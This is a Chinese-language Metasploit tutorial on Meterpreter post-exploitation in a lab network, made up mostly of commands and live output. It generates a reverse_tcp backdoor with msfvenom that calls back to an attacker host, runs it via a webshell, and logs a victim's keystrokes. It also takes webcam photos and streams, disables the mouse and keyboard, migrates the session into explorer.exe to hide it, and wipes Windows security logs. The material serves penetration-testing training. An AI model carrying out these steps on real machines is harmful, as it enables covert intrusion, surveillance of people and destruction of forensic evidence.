Metasploit Framework Handbook(二)

阅读量    72737 |

分享到: QQ空间 新浪微博 微信 QQ facebook twitter

 

前言

众所周知Metasploit工具是一款强大的渗透测试利器,在渗透测试中堪称一条龙服务,那么很多人真的能够认识到它其中的强大之处吗,了解其中的每部分功能吗,还是说在个别人眼中只是一个由虚拟机搭建的一个小拓扑使用其直接攻打windows主机拿到主机权限就结束了吗,事实上Metasploit这款工具能做的事情很多,包括:情报(信息)搜集、目标识别、服务枚举、漏洞探测、漏洞利用、权限提升、权限维持、社会工程、内网渗透等一系列操作。

由于网上大部分相关文章对于Metasploit框架没有一个整体而完整的讲解,很多都是讲述的某一个功能点或者漏洞的使用,比如:如何使用Metasploit进行内网代理渗透、如何使用Metasploit打开对方电脑摄像头、如何使用Metasploit监视对方主机、如何使用Metasploit利用永恒之蓝漏洞攻击Windows主机、Metasploit基础、Metasploit指令用法等等,这一现象也就造成了知识点的零碎、意乱,一定程度上导致初学者的盲目、误导等。

正因如此自己才打算总结整理一份关于Metasploit框架的使用手册:Metasploit Framework Handbook 主要讲述的是Metasploit框架的一个整体使用手册(包括工具模块的解读+实战操作),该手册主要分为四部分,如下:

  • 第一部分:Metasploit Framework Handbook (一)

Metasploit解读+实战操作(发展、框架、安装、配置、指令解读、情报搜集、渗透测试)

  • 第二部分:Metasploit Framework Handbook (二)

Meterpreter解读+实战操作(指令解读、内网渗透-后渗透-1)

  • 第三部分:Metasploit Framework Handbook (三)

Meterpreter解读+实战操作(内网渗透-后渗透-2)

  • 第四部分:Metasploit Framework Handbook (四)

MSFvenom解读+实战操作(指令解读、后门木门)

Metasploit Framework Handbook(一),本文Metasploit Framework Handbook (二)主要讲述的是手册的第二部分:Meterpreter解读+实战操作(指令解读、内网渗透-后渗透-1)

 

Meterpreter

Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力。

技术优势

  • 平台通用性

Metasploit 提供了各种主流操作系统和平台上的 Meterpreter 版本,包括 Windows,Linux,BSD 系统,并且同时支持 x86 和 x64 平台。另外,Meterpreter 还提供了基于 Java 和 PHP 的实现,以应用在各种不同的环境中。

  • 纯内存工作模式

执行漏洞渗透攻击的时候,会直接装载 Meterpreter 的动态链接库到目标系统进程的内存空间。而不是先将 Meterpreter 上传到磁盘,然后调用Loadlibrary 加载动态链接库来启动Meterpreter。

这种纯内存工作模式的好处就是启动隐蔽,很难被杀毒软件监测到。此外,也不需要访问目标主机的磁盘,基本不会留下入侵的证据。虽然现在的内存分析与提取技术能事后捕获到Meterpreter 的蛛丝马迹,但这种技术不仅难度大,而且成功率低。并且这种模式不会创建新的进程。

  • 灵活且加密的通信协议

Meterpreter 还提供了灵活加密的客户端服务通信协议,能够对网络传输进行加密,同时这种通信技术支持灵活的功能扩展。

Meterpreter 的网络通信协议采用 TLV 数据封住格式。

  • 易于扩展

Meterpreter 在功能上来说不是一般的 ShellCode 能比拟的,但如果用户需要一些特殊或者定制的功能,也可以轻易的在 Meterpreter 中添加扩展(或插件)来实现。

命令解读-Windows

Windows下的Meterpreter命令解读

核心命令

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         帮助手册
    background                将当前会话放置后台
    bg                        background命令的别名
    bgkill                    杀死meterpreter后台运行的脚本
    bglist                    列出meterpreter后台运行的脚本
    bgrun                     在后台运行一个meterpreter脚本
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  关闭Unicode字符串的编码
    enable_unicode_encoding   启用Unicode字符串的编码
    exit                      关闭退出 meterpreter session
    get_timeouts              查看当前会话超时信息
    guid                      查看会话GUID
    help                      帮助手册
    info                      展示post模块信息
    irb                       在当前会话中打开一个交互式的Ruby shell
    load                      加载一个或多个meterpreter扩展
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   进程迁移(将Meterpreter会话移植到指定pid值进程中)
    pivot                     Manage pivot listeners
    pry                       Open the Pry debugger on the current session
    quit                      关闭退出 meterpreter session
    read                      Reads data from a channel
    resource                  运行存储在文件中的命令(运行批处理文件)
    run                       执行一个 meterpreter 脚本 或 Post 模块
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  快速切换到另一个会话中(sessions -i ID)
    set_timeouts              设置当前会话超时信息
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       "load"的别名(已弃用)
    uuid                      获取当前会话的uuid信息
    write                     Writes data to a channel

文件系统命令

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           读取会话系统中某一个文件的内容并显示
    cd            改变当前目录
    checksum      检索文件的校验和
    cp            文件复制操作
    dir           列出当前目录下的文件 (ls的别名)
    download      从当前目录下载某一个文件
    edit          编辑文件
    getlwd        打印本地当前工作目录
    getwd         打印工作目录
    lcd           改变本地工作目录
    lls           列出本地目录下的文件
    lpwd          打印本地当前工作目录
    ls            列出目录下所有文件
    mkdir         创建文件夹
    mv            移动文件
    pwd           打印当前工作目录
    rm            删除某个特殊文件
    rmdir         删除某个目录
    search        搜索文件
    show_mount    List all mount points/logical drives
    upload        上传文件或一个目录

网络命令

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           显示ARP缓存
    getproxy      查看当前代理配置
    ifconfig      查看网络接口信息
    ipconfig      查看网络接口信息
    netstat       查看网络连接情况
    portfwd       端口转发
    resolve       Resolve a set of host names on the target
    route         查看和修改路由表

系统命令

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       清除windows中的应用程序日志、系统日志、安全日志
    drop_token    Relinquishes any active impersonation token.
    execute       执行一个命令
    getenv        获取一个或多个换几个环境变量
    getpid        获取当前会话进程ID(pid)
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        查看权限
    kill          杀死进程(kill <pid>)
    localtime     获取目标系统当前日期和时间
    pgrep         通过名字(特定字符串)查询相关进程
    pkill         通过进程名关闭进程
    ps            查询列出当前运行的进程信息
    reboot        重启远程计算机
    reg           修改远程计算机注册表
    rev2self      Calls RevertToSelf() on the remote machine
    shell         进入目标系统交互式shell终端
    shutdown      将远程计算机关机
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       获取远程计算机系统详细信息

用户接口命令

Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   查看所有可用的桌面
    getdesktop     获取当前meterpreter关联的桌面
    idletime       Returns the number of seconds the remote user has been idle
    keyboard_send  Send keystrokes
    keyevent       Send key events
    keyscan_dump   导出键盘记录数据
    keyscan_start  开始键盘记录
    keyscan_stop   关闭键盘记录
    mouse          Send mouse events
    screenshare    查看远程用户桌面信息
    screenshot     捕获目标屏幕快照信息(截屏)
    setdesktop     设置meterpreter关联的桌面
    uictl          开启或禁止键盘/鼠标(uictl disable/enable keyboard/mouse/all)

网络摄像头命令

Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    开启视频聊天
    webcam_list    查看摄像头
    webcam_snap    通过摄像头拍照
    webcam_stream  通过摄像头开启视频

视频播放命令

Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          从目标系统播放音频

提权命令

Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     尝试去提权

密码捕获命令

Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      查看SAM数据库信息

时间戳命令

Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     操纵文件MACE属性

命令解读-Linux

Linux下的Meterpreter命令解读

核心命令

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         帮助手册
    background                将当前会话放置后台
    bg                        background命令的别名
    bgkill                    杀死meterpreter后台运行的脚本
    bglist                    列出meterpreter后台运行的脚本
    bgrun                     在后台运行一个meterpreter脚本
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  关闭Unicode字符串的编码
    enable_unicode_encoding   启用Unicode字符串的编码
    exit                      关闭退出 meterpreter session
    get_timeouts              查看当前会话超时信息
    guid                      查看会话GUID
    help                      帮助手册
    info                      展示post模块信息
    irb                       在当前会话中打开一个交互式的Ruby shell
    load                      加载一个或多个meterpreter扩展
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   进程迁移(将Meterpreter会话移植到指定pid值进程中)
    pry                       Open the Pry debugger on the current session
    quit                      关闭退出 meterpreter session
    read                      Reads data from a channel
    resource                  运行存储在文件中的命令(运行批处理文件)
    run                       执行一个 meterpreter 脚本 或 Post 模块
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  快速切换到另一个会话中(sessions -i ID)
    set_timeouts              设置当前会话超时信息
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       "load"的别名(已弃用)
    uuid                      获取当前会话的uuid信息
    write                     Writes data to a channel

文件系统命令

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           读取会话系统中某一个文件的内容并显示
    cd            改变当前目录
    checksum      检索文件的校验和
    cp            文件复制操作
    dir           列出当前目录下的文件 (ls的别名)
    download      从当前目录下载某一个文件
    edit          编辑文件
    getlwd        打印本地当前工作目录
    getwd         打印工作目录
    lcd           改变本地工作目录
    lls           列出本地目录下的文件
    lpwd          打印本地当前工作目录
    ls            列出目录下所有文件
    mkdir         创建文件夹
    mv            移动文件
    pwd           打印当前工作目录
    rm            删除某个特殊文件
    rmdir         删除某个目录
    search        搜索文件
    upload        上传文件或一个目录

网络命令

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    portfwd       端口转发

系统命令

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       执行一个命令
    getenv        获取一个或多个换几个环境变量
    getpid        获取当前会话进程ID(pid)
    getuid        查看权限
    kill          杀死进程(kill <pid>)
    localtime     获取目标系统当前日期和时间
    pgrep         通过名字(特定字符串)查询相关进程
    pkill         通过进程名关闭进程
    ps            查询列出当前运行的进程信息
    shell         进入目标系统交互式shell终端
    sysinfo       获取远程计算机系统详细信息

视频播放命令

Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          从目标系统播放音频

实战攻略

环境准备

以得到Windows下的Meterpreter来演示相关实战操作(拿下一台www服务器,反弹一个meterpreter终端)

  • 网络拓扑

网络分布主要分为外网和内网两大部分,在边界路由器中外网IP段为:192.33.6.0/24、内网IP网段为:192.168.9.0/24

  • msfvenom制作后门反弹shell
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.33.6.150 lport=3333 -f exe -o msf.exe
  • 实战利用:已得到www服务器后门webshell,上传msf.exe,执行反弹后门shell

基本系统操作指令

  • 指令指南
    Command                   Description
    -------                   -----------
    background                将当前会话放置后台
    bg                        background命令的别名
    exit/quit                 关闭退出 meterpreter session
    info                      展示post模块信息
    load                      加载一个或多个meterpreter扩展
    run                       执行一个 meterpreter 脚本 或 Post 模块
    sessions                  快速切换到另一个会话中(sessions -i ID)
    use                       "load"的别名(已弃用)
    getuid                      查看权限
    kill                        杀死进程(kill <pid>)
    pgrep                      通过名字(特定字符串)查询相关进程
    pkill                      通过进程名关闭进程
    ps                        查询列出当前运行的进程信息
    reboot                    重启远程计算机
    shell                     进入目标系统交互式shell终端
    shutdown                    将远程计算机关机
    sysinfo                    获取远程计算机系统详细信息

键盘&鼠标操作

  • 指令指南
uictl [enable/disable] [keyboard/mouse/all]  #开启或禁止键盘/鼠标
uictl disable mouse  #禁用鼠标
uictl disable keyboard  #禁用键盘
  • 实战
meterpreter > uictl -h
Usage: uictl [enable/disable] [keyboard/mouse/all]
meterpreter >

键盘记录

  • 指令指南
keyscan_start  #开始键盘记录
keyscan_dump   #导出记录数据
keyscan_stop  #结束键盘记录
  • 实战:监控目标机键盘记录

注意:这里需要监控什么账户的键盘记录就需要将会话进程切换到什么账户权限中,这里原本权限是system为了监控root用户键盘记录,所以进行进程的迁移

meterpreter > getuid 
Server username: NT AUTHORITYSYSTEM
meterpreter > migrate 2308
[*] Migrating from 2904 to 2308...
[*] Migration completed successfully.
meterpreter > getuid 
Server username: WIN-5DTIE0M734Eroot
meterpreter >

开始监控

meterpreter > keyscan_start 
Starting the keystroke sniffer ...
meterpreter > keyscan_dump 
Dumping captured keystrokes...
woaini<CR>


meterpreter >
meterpreter > keyscan_stop 
Stopping the keystroke sniffer...
meterpreter >

摄像头操作

  • 指令指南
webcam_list     #查看摄像头
webcam_snap     #通过摄像头拍照
webcam_stream   #通过摄像头开启视频监控(以网页形式进行监控==直播)
webcam_chat     #通过摄像头开启视频聊天(对方有弹窗)
  • 实战:通过摄像头拍照
meterpreter > webcam_list 
1: EasyCamera
meterpreter >
meterpreter > webcam_snap 
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /home/qftm/Desktop/RLBlgNRf.jpeg
meterpreter >
meterpreter > lls /home/qftm/Desktop/
Listing Local: /home/qftm/Desktop/
==================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   4096   dir   2020-05-03 22:04:11 -0400  ProgrammingProjects
40777/rwxrwxrwx   4096   dir   2020-06-16 11:23:45 -0400  QSec
100644/rw-r--r--  35533  fil   2020-06-25 02:12:46 -0400  RLBlgNRf.jpeg
100644/rw-r--r--  21     fil   2020-06-24 23:56:29 -0400  hacking.txt

meterpreter >
  • 实战:通过摄像头开启视频监控
meterpreter > webcam_stream 
[*] Starting...
[*] Preparing player...
[*] Opening player at: /home/qftm/Desktop/jhQokqrO.html
[*] Streaming...
Opening in existing browser session.

进程操作

  • 查看目标机进程信息
meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]                                                
 4     0     System             x64   0                                      
 100   484   svchost.exe        x64   0        NT AUTHORITYLOCAL SERVICE    
 244   4     smss.exe           x64   0        NT AUTHORITYSYSTEM           SystemRootSystem32smss.exe
 332   320   csrss.exe          x64   0        NT AUTHORITYSYSTEM           C:Windowssystem32csrss.exe
 384   320   wininit.exe        x64   0        NT AUTHORITYSYSTEM           C:Windowssystem32wininit.exe
 392   376   csrss.exe          x64   1        NT AUTHORITYSYSTEM           C:Windowssystem32csrss.exe
 428   376   winlogon.exe       x64   1        NT AUTHORITYSYSTEM           C:Windowssystem32winlogon.exe
 484   384   services.exe       x64   0        NT AUTHORITYSYSTEM           C:Windowssystem32services.exe
 500   384   lsass.exe          x64   0        NT AUTHORITYSYSTEM           C:Windowssystem32lsass.exe
 508   384   lsm.exe            x64   0        NT AUTHORITYSYSTEM           C:Windowssystem32lsm.exe
 604   484   svchost.exe        x64   0        NT AUTHORITYSYSTEM           
 664   484   svchost.exe        x64   0        NT AUTHORITYNETWORK SERVICE  
 680   484   svchost.exe        x64   0        NT AUTHORITYNETWORK SERVICE  
 756   484   svchost.exe        x64   0        NT AUTHORITYLOCAL SERVICE    
 764   484   svchost.exe        x64   0        NT AUTHORITYLOCAL SERVICE    
 832   484   svchost.exe        x64   0        NT AUTHORITYSYSTEM           
 876   484   svchost.exe        x64   0        NT AUTHORITYSYSTEM           
 1112  484   spoolsv.exe        x64   0        NT AUTHORITYSYSTEM           C:WindowsSystem32spoolsv.exe
 1140  484   svchost.exe        x64   0        NT AUTHORITYLOCAL SERVICE    
 1268  604   WmiPrvSE.exe                                                    
 1288  484   VGAuthService.exe  x64   0        NT AUTHORITYSYSTEM           C:Program FilesVMwareVMware ToolsVMware VGAuthVGAuthService.exe
 1364  484   vmtoolsd.exe       x64   0        NT AUTHORITYSYSTEM           C:Program FilesVMwareVMware Toolsvmtoolsd.exe
 1380  484   svchost.exe        x64   0        NT AUTHORITYSYSTEM           
 1504  484   VSSVC.exe          x64   0        NT AUTHORITYSYSTEM           
 1592  484   svchost.exe        x64   0        NT AUTHORITYNETWORK SERVICE  
 1812  484   dllhost.exe        x64   0        NT AUTHORITYSYSTEM           
 1900  484   msdtc.exe          x64   0        NT AUTHORITYNETWORK SERVICE  
 2164  484   svchost.exe        x64   0        NT AUTHORITYSYSTEM           
 2204  484   taskhost.exe       x64   1        WIN-5DTIE0M734Eroot          C:Windowssystem32taskhost.exe
 2276  832   dwm.exe            x64   1        WIN-5DTIE0M734Eroot          C:Windowssystem32Dwm.exe
 2308  2268  explorer.exe       x64   1        WIN-5DTIE0M734Eroot          C:WindowsExplorer.EXE
 2436  2308  vm3dservice.exe    x64   1        WIN-5DTIE0M734Eroot          C:WindowsSystem32vm3dservice.exe
 2444  2308  vmtoolsd.exe       x64   1        WIN-5DTIE0M734Eroot          C:Program FilesVMwareVMware Toolsvmtoolsd.exe
 2640  484   SearchIndexer.exe  x64   0        NT AUTHORITYSYSTEM           

meterpreter >

进程迁移

  • 指令指南
getpid                # 获取当前进程的pid
ps                   # 查看当前活跃进程
migrate <pid值>     #将Meterpreter会话移植到指定pid值进程中
kill <pid值>         #杀死进程
  • 实战:迁移meterpreter会话进程到其他进程中,实现恶意会话进程的隐藏

获取当前进程ID

meterpreter > getpid 
Current pid: 1112
meterpreter >

查看目标机进程信息

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]                                                
 4     0     System             x64   0                                      
 100   484   svchost.exe        x64   0        NT AUTHORITYLOCAL SERVICE    
 244   4     smss.exe           x64   0        NT AUTHORITYSYSTEM           SystemRootSystem32smss.exe
 332   320   csrss.exe          x64   0        NT AUTHORITYSYSTEM           C:Windowssystem32csrss.exe
 384   320   wininit.exe        x64   0        NT AUTHORITYSYSTEM           C:Windowssystem32wininit.exe
 392   376   csrss.exe          x64   1        NT AUTHORITYSYSTEM           C:Windowssystem32csrss.exe
 428   376   winlogon.exe       x64   1        NT AUTHORITYSYSTEM           C:Windowssystem32winlogon.exe
 484   384   services.exe       x64   0        NT AUTHORITYSYSTEM           C:Windowssystem32services.exe
 500   384   lsass.exe          x64   0        NT AUTHORITYSYSTEM           C:Windowssystem32lsass.exe
 508   384   lsm.exe            x64   0        NT AUTHORITYSYSTEM           C:Windowssystem32lsm.exe
 604   484   svchost.exe        x64   0        NT AUTHORITYSYSTEM           
 664   484   svchost.exe        x64   0        NT AUTHORITYNETWORK SERVICE  
 680   484   svchost.exe        x64   0        NT AUTHORITYNETWORK SERVICE  
 756   484   svchost.exe        x64   0        NT AUTHORITYLOCAL SERVICE    
 764   484   svchost.exe        x64   0        NT AUTHORITYLOCAL SERVICE    
 832   484   svchost.exe        x64   0        NT AUTHORITYSYSTEM           
 876   484   svchost.exe        x64   0        NT AUTHORITYSYSTEM           
 1112  484   spoolsv.exe        x64   0        NT AUTHORITYSYSTEM           C:WindowsSystem32spoolsv.exe
 1140  484   svchost.exe        x64   0        NT AUTHORITYLOCAL SERVICE    
 1268  604   WmiPrvSE.exe                                                    
 1288  484   VGAuthService.exe  x64   0        NT AUTHORITYSYSTEM           C:Program FilesVMwareVMware ToolsVMware VGAuthVGAuthService.exe
 1364  484   vmtoolsd.exe       x64   0        NT AUTHORITYSYSTEM           C:Program FilesVMwareVMware Toolsvmtoolsd.exe
 1592  484   svchost.exe        x64   0        NT AUTHORITYNETWORK SERVICE  
 1812  484   dllhost.exe        x64   0        NT AUTHORITYSYSTEM           
 1900  484   msdtc.exe          x64   0        NT AUTHORITYNETWORK SERVICE  
 2164  484   svchost.exe        x64   0        NT AUTHORITYSYSTEM           
 2204  484   taskhost.exe       x64   1        WIN-5DTIE0M734Eroot          C:Windowssystem32taskhost.exe
 2276  832   dwm.exe            x64   1        WIN-5DTIE0M734Eroot          C:Windowssystem32Dwm.exe
 2308  2268  explorer.exe       x64   1        WIN-5DTIE0M734Eroot          C:WindowsExplorer.EXE
 2436  2308  vm3dservice.exe    x64   1        WIN-5DTIE0M734Eroot          C:WindowsSystem32vm3dservice.exe
 2444  2308  vmtoolsd.exe       x64   1        WIN-5DTIE0M734Eroot          C:Program FilesVMwareVMware Toolsvmtoolsd.exe
 2640  484   SearchIndexer.exe  x64   0        NT AUTHORITYSYSTEM           

meterpreter >

选择目标主机活跃进程隐藏会话进程,注入进程:将pid-1112迁移注入到pid-2308的explorer.exe进程中

2308  2268  explorer.exe       x64   1        WIN-5DTIE0M734Eroot          C:WindowsExplorer.EXE

将Meterpreter会话移植到指定pid值进程中

meterpreter > migrate 2308
[*] Migrating from 1112 to 2308...
[*] Migration completed successfully.
meterpreter >

这里会发现,再次查看目标机进程信息会发现原有进程pid=1112还存在,但是已经不起作用了,属于无效进程,但是使用kill 1119是杀不死该进程的,因为该进程的权限是system的,就算目标机用户发现pid=1112有异常将其关闭,也不会影响迁移注入后的会话进程。

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                  Path
 ---   ----  ----               ----  -------  ----                  ----
 0     0     [System Process]                                        
 4     0     System                                                  
 100   484   svchost.exe                                             
 244   4     smss.exe                                                
 332   320   csrss.exe                                               
 384   320   wininit.exe                                             
 392   376   csrss.exe                                               
 428   376   winlogon.exe                                            
 484   384   services.exe                                            
 500   384   lsass.exe                                               
 508   384   lsm.exe                                                 
 604   484   svchost.exe                                             
 664   484   svchost.exe                                             
 680   484   svchost.exe                                             
 756   484   svchost.exe                                             
 764   484   svchost.exe                                             
 832   484   svchost.exe                                             
 876   484   svchost.exe                                             
 1112  484   spoolsv.exe                                             
 1140  484   svchost.exe                                             
 1268  604   WmiPrvSE.exe                                            
 1288  484   VGAuthService.exe                                       
 1364  484   vmtoolsd.exe                                            
 1592  484   svchost.exe                                             
 1812  484   dllhost.exe                                             
 1900  484   msdtc.exe                                               
 2164  484   svchost.exe                                             
 2204  484   taskhost.exe       x64   1        WIN-5DTIE0M734Eroot  C:Windowssystem32taskhost.exe
 2276  832   dwm.exe            x64   1        WIN-5DTIE0M734Eroot  C:Windowssystem32Dwm.exe
 2308  2268  explorer.exe       x64   1        WIN-5DTIE0M734Eroot  C:WindowsExplorer.EXE
 2436  2308  vm3dservice.exe    x64   1        WIN-5DTIE0M734Eroot  C:WindowsSystem32vm3dservice.exe
 2444  2308  vmtoolsd.exe       x64   1        WIN-5DTIE0M734Eroot  C:Program FilesVMwareVMware Toolsvmtoolsd.exe
 2640  484   SearchIndexer.exe                                       

meterpreter >

查看迁移后的会话进程ID和权限:explorer进程为root普通用户权限,相当于降权(注意:原有explorer进程不受影响)

meterpreter > getpid 
Current pid: 2308
meterpreter > 
meterpreter > getuid 
Server username: WIN-5DTIE0M734Eroot
meterpreter >

一旦降了权就无法迁移到system权限上了:升权被限制

meterpreter > migrate 2164
[*] Migrating from 2308 to 2164...
[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)
meterpreter >

执行文件操作

  • 指令指南
execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
  • 实战:执行目标机中的文件
meterpreter > execute -h
Usage: execute -f file [options]
Executes a command on the remote machine.

OPTIONS:

    -H        Create the process hidden from view.
    -a <opt>  The arguments to pass to the command.
    -c        Channelized I/O (required for interaction).
    -d <opt>  The 'dummy' executable to launch when using -m.
    -f <opt>  The executable command to run.
    -h        Help menu.
    -i        Interact with the process after creating it.
    -k        Execute process on the meterpreters current desktop
    -m        Execute from memory.
    -s <opt>  Execute process in a given session as the session user
    -t        Execute process with currently impersonated thread token
meterpreter > execute -H -i -f cmd.exe
Process 3004 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:Windowssystem32>whoami
whoami
nt authoritysystem

C:Windowssystem32>exit
exit
meterpreter >

清除日志

  • 指令指南
clearav  #清除windows中的应用程序日志、系统日志、安全日志
  • 实战:清除日志痕迹记录
meterpreter > clearev 
[*] Wiping 1069 records from Application...
[*] Wiping 5242 records from System...
[*] Wiping 1168 records from Security...
meterpreter >

文件操作

  • 基本文件系统命令
    Command       Description
    -------       -----------
    cat           读取会话系统中某一个文件的内容并显示
    cd            改变当前目录
    checksum      检索文件的校验和
    cp            文件复制操作
    dir           列出当前目录下的文件 (ls的别名)
    download      从当前目录下载某一个文件
    edit          编辑文件
    getlwd        打印本地当前工作目录
    getwd         打印工作目录
    lcd           改变本地工作目录
    lls           列出本地目录下的文件
    lpwd          打印本地当前工作目录
    ls            列出目录下所有文件
    mkdir         创建文件夹
    mv            移动文件
    pwd           打印当前工作目录
    rm            删除某个特殊文件
    rmdir         删除某个目录
    search        搜索文件
    show_mount    List all mount points/logical drives
    upload        上传文件或一个目录
  • 文件操作

查看当前维持的会话工作目录

meterpreter > getwd
C:Windowssystem32
meterpreter >

查看本地攻击机工作目录

meterpreter > getlwd
/home/qftm
meterpreter >

切换会话目录

meterpreter > cd c:\
meterpreter > pwd
c:
meterpreter >

查看特定目录下文件信息

meterpreter > ls
Listing: c:
============

Mode             Size     Type  Last modified              Name
----             ----     ----  -------------              ----
40777/rwxrwxrwx  0        dir   2009-07-13 23:18:56 -0400  $Recycle.Bin
40777/rwxrwxrwx  0        dir   2009-07-14 01:08:56 -0400  Documents and Settings
40777/rwxrwxrwx  0        dir   2009-07-13 23:20:08 -0400  PerfLogs
40555/r-xr-xr-x  4096     dir   2009-07-13 23:20:08 -0400  Program Files
40555/r-xr-xr-x  4096     dir   2009-07-13 23:20:08 -0400  Program Files (x86)
40777/rwxrwxrwx  4096     dir   2009-07-13 23:20:08 -0400  ProgramData
40777/rwxrwxrwx  0        dir   2020-02-13 10:51:36 -0500  Recovery
40777/rwxrwxrwx  4096     dir   2020-02-13 10:48:53 -0500  System Volume Information
40555/r-xr-xr-x  4096     dir   2009-07-13 23:20:08 -0400  Users
40777/rwxrwxrwx  16384    dir   2009-07-13 23:20:08 -0400  Windows
40777/rwxrwxrwx  0        dir   2020-06-18 11:57:25 -0400  hack
0000/---------   1237680  fif   1971-09-30 08:50:40 -0400  pagefile.sys
40777/rwxrwxrwx  0        dir   2020-04-25 20:38:11 -0400  software

meterpreter >

向受害者主机创建相应文件夹并向主机上传文件:hacking.txt

本地生成

 → Qftm :~/Desktop# vim hacking.txt
 → Qftm :~/Desktop# ls
hacking.txt  ProgrammingProjects  QSec
 → Qftm :~/Desktop# cat hacking.txt 
Hacking by qftm.....
 → Qftm :~/Desktop#

 meterpreter > lls
Listing Local: /home/qftm/Desktop
=================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   4096  dir   2020-05-03 22:04:11 -0400  ProgrammingProjects
40777/rwxrwxrwx   4096  dir   2020-06-16 11:23:45 -0400  QSec
100644/rw-r--r--  21    fil   2020-06-24 23:56:29 -0400  hacking.txt

meterpreter >

像受害机上传文件并查看

meterpreter > mkdir hack
Creating directory: hack
meterpreter > ls
Listing: c:
============

Mode             Size     Type  Last modified              Name
----             ----     ----  -------------              ----
40777/rwxrwxrwx  0        dir   2009-07-13 23:18:56 -0400  $Recycle.Bin
40777/rwxrwxrwx  0        dir   2009-07-14 01:08:56 -0400  Documents and Settings
40777/rwxrwxrwx  0        dir   2009-07-13 23:20:08 -0400  PerfLogs
40555/r-xr-xr-x  4096     dir   2009-07-13 23:20:08 -0400  Program Files
40555/r-xr-xr-x  4096     dir   2009-07-13 23:20:08 -0400  Program Files (x86)
40777/rwxrwxrwx  4096     dir   2009-07-13 23:20:08 -0400  ProgramData
40777/rwxrwxrwx  0        dir   2020-02-13 10:51:36 -0500  Recovery
40777/rwxrwxrwx  4096     dir   2020-02-13 10:48:53 -0500  System Volume Information
40555/r-xr-xr-x  4096     dir   2009-07-13 23:20:08 -0400  Users
40777/rwxrwxrwx  16384    dir   2009-07-13 23:20:08 -0400  Windows
40777/rwxrwxrwx  0        dir   2020-06-25 00:01:24 -0400  hack
0000/---------   1237680  fif   1971-09-30 08:50:40 -0400  pagefile.sys
40777/rwxrwxrwx  0        dir   2020-04-25 20:38:11 -0400  software

meterpreter > upload hacking.txt c:hack
[*] uploading  : hacking.txt -> c:hack
[*] uploaded   : hacking.txt -> c:hackhacking.txt
meterpreter > ls hack 
Listing: hack
=============

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  21    fil   2020-06-25 00:01:47 -0400  hacking.txt

meterpreter > cat c:\hack\hacking.txt
Hacking by qftm.....
meterpreter >

修改hacking.txt

meterpreter > cd c:\hack
meterpreter > ls
Listing: c:hack
================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  21    fil   2020-06-25 00:01:47 -0400  hacking.txt

meterpreter > edit hacking.txt 
meterpreter > cat hacking.txt 
Hacking by qftm.....

edit by attack1
meterpreter >

删除hacking.txt文件

meterpreter > rm hacking.txt 
meterpreter > ls
No entries exist in c:hack
meterpreter >

删除c:\hack目录

meterpreter > ls
Listing: c:
============

Mode             Size     Type  Last modified              Name
----             ----     ----  -------------              ----
40777/rwxrwxrwx  0        dir   2009-07-13 23:18:56 -0400  $Recycle.Bin
40777/rwxrwxrwx  0        dir   2009-07-14 01:08:56 -0400  Documents and Settings
40777/rwxrwxrwx  0        dir   2009-07-13 23:20:08 -0400  PerfLogs
40555/r-xr-xr-x  4096     dir   2009-07-13 23:20:08 -0400  Program Files
40555/r-xr-xr-x  4096     dir   2009-07-13 23:20:08 -0400  Program Files (x86)
40777/rwxrwxrwx  4096     dir   2009-07-13 23:20:08 -0400  ProgramData
40777/rwxrwxrwx  0        dir   2020-02-13 10:51:36 -0500  Recovery
40777/rwxrwxrwx  4096     dir   2020-02-13 10:48:53 -0500  System Volume Information
40555/r-xr-xr-x  4096     dir   2009-07-13 23:20:08 -0400  Users
40777/rwxrwxrwx  16384    dir   2009-07-13 23:20:08 -0400  Windows
40777/rwxrwxrwx  0        dir   2020-06-25 00:01:24 -0400  hack
